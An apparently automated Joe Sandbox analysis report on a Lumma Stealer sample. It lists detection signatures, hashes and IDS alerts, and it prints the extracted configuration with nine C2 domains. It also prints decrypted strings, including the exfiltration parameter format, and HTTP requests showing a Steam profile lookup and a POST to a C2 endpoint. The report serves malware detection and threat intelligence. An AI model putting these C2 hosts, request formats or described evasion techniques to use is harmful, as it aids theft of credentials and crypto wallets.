Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3LUyRfIoKs.exe

Overview

General Information

Sample name:3LUyRfIoKs.exe
renamed because original name is a hash value
Original sample name:e17baab743930b14a8d9a54086f091d6.exe
Analysis ID:1581617
MD5:e17baab743930b14a8d9a54086f091d6
SHA1:7eed52a4f370c7dc47ac8e4a7ea04a16fafd5993
SHA256:315aee541b7f4d32b0fa71932e9227aa3ef1667856d5dc35c97bf1434e2ae31c
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 3LUyRfIoKs.exe (PID: 5856 cmdline: "C:\Users\user\Desktop\3LUyRfIoKs.exe" MD5: E17BAAB743930B14A8D9A54086F091D6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["cashfuzysao.buzz", "rebuildeso.buzz", "inherineau.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "mindhandru.buzz", "screwamusresz.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2268452542.00000000013F4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: 3LUyRfIoKs.exe PID: 5856JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: 3LUyRfIoKs.exe PID: 5856JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: 3LUyRfIoKs.exe PID: 5856JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:27.833768+010020283713Unknown Traffic192.168.2.54970423.55.153.106443TCP
                2024-12-28T09:56:30.264241+010020283713Unknown Traffic192.168.2.549705104.21.66.86443TCP
                2024-12-28T09:56:32.278763+010020283713Unknown Traffic192.168.2.549706104.21.66.86443TCP
                2024-12-28T09:56:34.845788+010020283713Unknown Traffic192.168.2.549707104.21.66.86443TCP
                2024-12-28T09:56:37.157974+010020283713Unknown Traffic192.168.2.549709104.21.66.86443TCP
                2024-12-28T09:56:39.507854+010020283713Unknown Traffic192.168.2.549710104.21.66.86443TCP
                2024-12-28T09:56:42.555579+010020283713Unknown Traffic192.168.2.549719104.21.66.86443TCP
                2024-12-28T09:56:45.440158+010020283713Unknown Traffic192.168.2.549731104.21.66.86443TCP
                2024-12-28T09:56:48.868512+010020283713Unknown Traffic192.168.2.549738104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:30.996564+010020546531A Network Trojan was detected192.168.2.549705104.21.66.86443TCP
                2024-12-28T09:56:33.056715+010020546531A Network Trojan was detected192.168.2.549706104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:30.996564+010020498361A Network Trojan was detected192.168.2.549705104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:33.056715+010020498121A Network Trojan was detected192.168.2.549706104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:25.766927+010020585721Domain Observed Used for C2 Detected192.168.2.5642001.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:25.911826+010020585761Domain Observed Used for C2 Detected192.168.2.5535921.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:26.054370+010020585781Domain Observed Used for C2 Detected192.168.2.5579101.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:25.477482+010020585801Domain Observed Used for C2 Detected192.168.2.5641501.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:24.893279+010020585821Domain Observed Used for C2 Detected192.168.2.5612541.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:25.050344+010020585841Domain Observed Used for C2 Detected192.168.2.5607541.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:25.192961+010020585861Domain Observed Used for C2 Detected192.168.2.5574841.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:25.335802+010020585881Domain Observed Used for C2 Detected192.168.2.5619601.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:25.618979+010020585901Domain Observed Used for C2 Detected192.168.2.5566571.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:43.351379+010020480941Malware Command and Control Activity Detected192.168.2.549719104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:45.444253+010028438641A Network Trojan was detected192.168.2.549731104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:28.598026+010028586661Domain Observed Used for C2 Detected192.168.2.54970423.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 3LUyRfIoKs.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://lev-tolstoi.com/taAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com:443/apilAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apixAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 3LUyRfIoKs.exe.5856.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["cashfuzysao.buzz", "rebuildeso.buzz", "inherineau.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "mindhandru.buzz", "screwamusresz.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: 3LUyRfIoKs.exeVirustotal: Detection: 59%Perma Link
                Source: 3LUyRfIoKs.exeReversingLabs: Detection: 65%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 3LUyRfIoKs.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: mindhandru.buzz
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AB57C0 CryptUnprotectData,0_2_00AB57C0
                Source: 3LUyRfIoKs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49731 version: TLS 1.2
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00ACD34A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00AE0340
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov eax, ebx0_2_00AC7440
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]0_2_00AC7440
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov edx, ebx0_2_00AA8600
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_00AE1720
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00AC1A10
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]0_2_00AACC7A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]0_2_00AE0D20
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00ACC09E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00ACC0E6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00ACE0DA
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov esi, ecx0_2_00AC90D0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00AC81CC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov ecx, eax0_2_00ACD116
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov eax, dword ptr [00AE6130h]0_2_00AB8169
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]0_2_00AE1160
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov ecx, eax0_2_00ACD17D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_00ACB170
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00ACC09E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00AD6210
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00AC83D8
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00AA73D0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00AA73D0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov ecx, eax0_2_00ABC300
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]0_2_00ACC465
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00ACC465
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00AB747D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov word ptr [edx], di0_2_00AB747D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov edi, ecx0_2_00ACA5B6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00AC8528
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]0_2_00ABB57D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_00AE06F0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov dword ptr [esp+20h], eax0_2_00AA9780
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then jmp edx0_2_00AC37D6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then jmp eax0_2_00AC9739
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_00AC7740
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov ecx, eax0_2_00ABD8AC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov ecx, eax0_2_00ABD8AC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov eax, ebx0_2_00ABC8A0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]0_2_00ABC8A0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]0_2_00ABC8A0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]0_2_00ABC8A0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov edx, ecx0_2_00ABB8F6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov edx, ecx0_2_00ABB8F6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov ecx, eax0_2_00ABD8D8
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov ecx, eax0_2_00ABD8D8
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00AC2830
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]0_2_00ADC830
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then push esi0_2_00AAC805
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00ACC850
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then jmp edx0_2_00AC39B9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]0_2_00AC39B9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00ACB980
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h0_2_00ADC990
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00AC89E9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00ACAAC0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then dec edx0_2_00ADFA20
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h0_2_00ADCA40
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]0_2_00AA8A50
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]0_2_00ABEB80
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov edx, ecx0_2_00AB8B1B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then dec edx0_2_00ADFB10
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]0_2_00AAAB40
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00AB4CA0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00ACDDFF
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_00ADCDF0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]0_2_00ADCDF0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_00ADCDF0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h0_2_00ADCDF0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]0_2_00ADEDC1
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov edx, ecx0_2_00AC6D2E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then dec edx0_2_00ADFD70
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]0_2_00AA2EB0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov edx, ecx0_2_00AC9E80
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00ACDE07
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then dec edx0_2_00ADFE00
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov ecx, eax0_2_00AC2E6D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then jmp edx0_2_00AC2E6D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]0_2_00AC2E6D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov edi, dword ptr [esp+28h]0_2_00AC5F1B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov ecx, eax0_2_00ACBF13
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00AB6F52

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.5:64200 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.5:60754 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.5:57484 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.5:53592 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.5:61960 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058582 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) : 192.168.2.5:61254 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.5:57910 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.5:56657 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.5:64150 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49719 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49731 -> 104.21.66.86:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49738 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
